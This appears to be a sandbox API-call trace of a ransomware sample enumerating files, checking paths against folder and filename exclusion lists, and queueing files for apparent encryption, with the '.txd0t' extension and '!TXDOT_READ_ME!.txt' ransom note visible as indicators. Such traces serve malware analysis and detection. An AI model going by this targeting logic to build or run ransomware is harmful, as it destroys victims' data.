(lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\programdata\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\drivers\\") returned 0x0 [0085.535] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\wsus\\") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="crypt_detect") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="cryptolocker") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="ransomware") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\WINDOWS") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.536] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1033", lpSrch="C:\\Program Files") returned 0x0 [0085.536] GetProcessHeap () returned 0xe30000 [0085.536] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.536] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0085.536] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\*") returned="C:\\588bce7c90097ed212\\1033\\*" [0085.536] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec22b0 [0085.536] StrCmpW (psz1=".", psz2=".") returned 0 [0085.536] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.536] StrCmpW (psz1="..", psz2=".") returned 1 [0085.536] StrCmpW (psz1="..", psz2="..") returned 0 [0085.536] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.536] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.536] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.536] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0085.536] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0085.536] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="C:\\588bce7c90097ed212\\1033\\eula.rtf" [0085.536] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.536] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.536] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.536] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.536] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.536] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.536] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.537] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.537] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.537] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.537] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.551] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.551] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1033\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\eula.rtf" [0085.551] SetEvent (hEvent=0x3fc) returned 1 [0085.552] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.552] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.552] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.552] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0085.552] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0085.552] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0085.552] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.552] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.552] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.552] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.552] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.552] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0085.565] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.565] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" [0085.565] SetEvent (hEvent=0x3fc) returned 1 [0085.565] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0085.565] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0085.565] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0085.565] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1033", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033") returned="C:\\588bce7c90097ed212\\1033" [0085.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\") returned="C:\\588bce7c90097ed212\\1033\\" [0085.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1033\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" [0085.565] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.565] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0085.565] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.566] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0085.566] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0085.566] FindNextFileW (in: hFindFile=0xec22b0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0085.566] FindClose (in: hFindFile=0xec22b0 | out: hFindFile=0xec22b0) returned 1 [0085.566] GetProcessHeap () returned 0xe30000 [0085.566] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed76e0 | out: hHeap=0xe30000) returned 1 [0085.566] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1035", cAlternateFileName="")) returned 1 [0085.566] StrCmpW (psz1="1035", psz2=".") returned 1 [0085.566] StrCmpW (psz1="1035", psz2="..") returned 1 [0085.566] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0085.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0085.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1035", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system32\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\syswow64\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\system\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\windows\\winsxs\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\roaming\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\local\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\appdata\\locallow\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\all users\\microsoft\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="\\inetpub\\logs\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\boot\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\perflogs\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\programdata\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\drivers\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\wsus\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\efstmpwp\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\$recycle.bin\\") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="crypt_detect") returned 0x0 [0085.566] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="cryptolocker") returned 0x0 [0085.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="ransomware") returned 0x0 [0085.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\WINDOWS") returned 0x0 [0085.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files (x86)") returned 0x0 [0085.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files") returned 0x0 [0085.567] GetProcessHeap () returned 0xe30000 [0085.567] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xed76e0 [0085.567] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0085.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\*") returned="C:\\588bce7c90097ed212\\1035\\*" [0085.567] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0085.567] StrCmpW (psz1=".", psz2=".") returned 0 [0085.567] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.567] StrCmpW (psz1="..", psz2=".") returned 1 [0085.567] StrCmpW (psz1="..", psz2="..") returned 0 [0085.567] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0085.567] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0085.567] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0085.567] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0085.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0085.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="C:\\588bce7c90097ed212\\1035\\eula.rtf" [0085.567] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.567] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0085.567] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0085.568] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0085.568] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0085.568] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0085.568] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0085.568] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.568] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0085.568] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0085.568] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.651] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.651] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1035\\eula.rtf", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" [0085.651] SetEvent (hEvent=0x418) returned 1 [0085.652] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0085.654] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0085.655] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0085.655] StrCpyNW (in: psz1=0xed76e0, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0085.655] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0085.655] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0085.655] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.655] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0085.655] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0085.655] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0085.655] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0085.655] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0085.664] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0085.664] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", cchMax=32000 | out: psz1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0085.664] SetEvent (hEvent=0x418) returned 1 [0085.666] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, 